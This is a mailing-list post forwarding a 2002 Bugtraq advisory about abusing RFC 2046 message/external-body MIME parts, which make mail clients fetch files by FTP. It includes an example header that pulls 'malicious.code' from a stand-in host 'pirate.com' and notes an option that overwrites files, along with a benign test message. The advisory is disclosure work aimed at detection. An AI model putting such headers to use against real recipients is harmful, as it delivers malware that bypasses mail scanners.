michael posted (questions) about the previous thing on message fragmentation (which was an RFC thing, Outlook was vulnerable, but it's possible some other mailers are vulnerable too, if they followed the RFC).
here's another RFC 2046 problem, a different attack this time. and yes, Outlook 2000 is vulnerable. -----Forwarded Message----- > From: Jose Marcio Martins da Cruz <[EMAIL PROTECTED]> > To: bugtraq <[EMAIL PROTECTED]> > Subject: Another possible RFC 2046 vulnerability. > Date: 27 Sep 2002 13:01:46 +0200 > > > Hi, > > Some days ago, we're talking about RFC 2046 message fragmentation > vulnerability. > > There is another related RFC 2046 vulnerability : message/external-body > message type. > > RFC 2046 message/external-body MIME type allows to send messages not by > it's content, but by reference. > > In this case, you can send a message with the following MIME tag : > > Content-Type: message/external-body; name="malicious.code"; > site="pirate.com"; mode="image"; > access-type=ANON-FTP; directory="pub" > > Client MUA, receives this and will get "malicious.code" file by > anonymous ftp from pirate.com ftp server. > > RFC 2046 defines five access-types :"FTP", "ANON-FTP", "TFTP", > "LOCAL-FILE", and "MAIL-SERVER". > > There are some other optional parameters to this feature. For example, > if the message includes parameter permission="write", existing file will > be overwriten. > > RFC 2046 says something about security in paragraph 5.2.3.6 : > > > (1) Accessing data via a "message/external-body" reference > > effectively results in the message recipient performing > > an operation that was specified by the message > > originator. It is therefore possible for the message > > originator to trick a recipient into doing something > > they would not have done otherwise. ... > > Combining different access-types (mainly anon-ftp, mail-server and > local-file) can create; IMHO, more complex attacks. > > What's interesting is that in this case the message and the malicious > code passes through two different network paths : messages is sent by > mail and the malicious code will be get by receiver by anonymous ftp. > > In the case of previous vulnerability (fragmented message), message and > malicious code uses the same network path. > > Classical mail server virus scanners will never see the malicious code > pass through it, as they will never have available entire malicious > code. > > The only way to detect it, IMHO, at mail server, is by lexical analysis > of MIME tags. > > Netscape Communicator 4.79 is compatible with this RFC 2046 feature. > > I can't say anything about others mail clients, as I'm sick at home and > I have no access to other MUAs. > > Attached to this message you'll find a message sent using this feature > and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can > check it out with Outlook and other popular MUAs. It's in the /var/mail > format : you can append it to your mailbox and try it... 8-) > > References : RFC 2046 - MIME - Media Types > > Jose Marcio > > > -- > ------------------------------------------------------------------- > Jose Marcio MARTINS DA CRUZ > Ecole Nationale Superieure des Mines de Paris > Centre de Calcul Tel . : 01.40.51.93.41 > 60, bd Saint Michel http://www.ensmp.fr/~martins > 75272 - PARIS CEDEX 06 mailto:[EMAIL PROTECTED] > ---- > > >From [EMAIL PROTECTED] Wed Sep 18 10:40:02 2002 > Return-Path: <[EMAIL PROTECTED]> > Received: from didi.ensmp.fr (didi [10.5.5.101]) > by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339 > for <[EMAIL PROTECTED]>; Wed, 18 Sep 2002 10:40:02 +0200 > Sender: [EMAIL PROTECTED] > Message-ID: <[EMAIL PROTECTED]> > Date: Wed, 18 Sep 2002 10:29:14 +0200 > From: Jose Martins <[EMAIL PROTECTED]> > Reply-To: [EMAIL PROTECTED] > X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686) > X-Accept-Language: en > MIME-Version: 1.0 > To: [EMAIL PROTECTED] > Subject: tst attachment > Content-Type: multipart/mixed; > boundary="------------FA43411C8E35AC7F655DA077" > X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr";)! > Status: RO > > This is a multi-part message in MIME format. > --------------FA43411C8E35AC7F655DA077 > Content-Type: text/plain; charset=us-ascii > Content-Transfer-Encoding: 7bit > > > RFC 2046 message/external-body compatibility test > > > --------------FA43411C8E35AC7F655DA077 > Content-Type: message/external-body; name="rfc2046.Z"; > site="ftp.inria.fr"; mode="image"; > access-type=ANON-FTP; directory="rfc/rfc20xx" > > > --------------FA43411C8E35AC7F655DA077-- > _ Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph To leave: send "unsubscribe" in the body to [EMAIL PROTECTED] Fully Searchable Archives With Friendly Web Interface at http://marc.free.net.ph To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED]
